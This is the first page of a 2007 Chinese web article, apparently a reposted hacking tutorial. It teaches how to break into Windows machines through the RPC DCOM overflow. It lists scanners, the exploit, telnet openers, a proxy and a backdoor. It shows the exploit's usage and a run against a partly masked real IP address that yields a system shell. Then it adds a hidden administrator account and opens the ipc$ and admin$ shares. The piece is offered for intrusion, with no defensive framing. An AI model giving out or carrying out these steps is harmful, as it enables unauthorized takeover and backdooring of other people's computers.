一步一个脚印 学好入侵

互联网 | 编辑: 黄蔚 2007-08-06 10:30:00转载 一键看全文

入侵工具dcomrpc

大家好,现在网上很流行dcomrpc,那好就说说利用dcomrpc入侵。很入侵之后做的事情。

需要的工具:

很好的: radmin.exe

扫描工具: retinarpcdcom.exe

溢出攻击工具:RpcDcom(通用溢出工具)

脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe

代理:sksockserver.exe

后门程序:WinEggDropShellPro3thVersion

好了,该做的都做的差不多了。

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必

随便扫一下就会发现有许多主机开放的135端口)

211.217.50.xx 第一个主机就被扫出来又此漏洞。

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下

其他的缺陷主机开了3389端口我们可以上去看一下是xp版本还是win2k是win2k server版本展开命令行:

[查看dcomrpc的用法 用法 dcomrpc -d <host> [options] ]

F:/hack>cd rpc/dcomrpc

RPC DCOM Expl01t coded by .:[oc192.us]:. Security

Complied and Modified by Expl01t www.longker.com

Usage:

dcomrpc -d <host> [options]

Options:

-d: Hostname to attack [Required]

-t: Type [Default: 0]

-r: Return address [Default: Selected from target]

-p: Attack port [Default: 135]

-l: Bindshell port [Default: 666]

Types:

0 [0x0018759f]: [Win2k-Universal]

1 [0x0100139d]: [WinXP-Universal]

开始进行溢出:

F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0

RPC DCOM remote expl01t - .:[oc192.us]:. Security

Complied and recorrected by Expl01t www.longker.com

[+] Resolving host..

[+] Done.

[+] Expl01ting....Just wait......

等到出现,说明溢出成功

c:/winnt/system32>

接着我们建立用户

c:/winnt/system32>net user blueye$ 1111 /add

命令成功完成。

把用户添加成超级管理员

c:/winnt/system32>net localgroup administrators blueye$ /add

命令成功完成。

看看共享开了没有没有的话把共享开开

c:/winnt/system32>net share

清单是空的。

c:/winnt/system32>net share ipc$

命令成功完成。

c:/winnt/system32>net share admin$

命令成功完成。

提示:试试键盘 “← →” 可以实现快速翻页 

总共 2 页12
一键看全文

本文导航

相关阅读

每日精选

点击查看更多

首页 手机 数码相机 笔记本 游戏 DIY硬件 硬件外设 办公中心 数字家电 平板电脑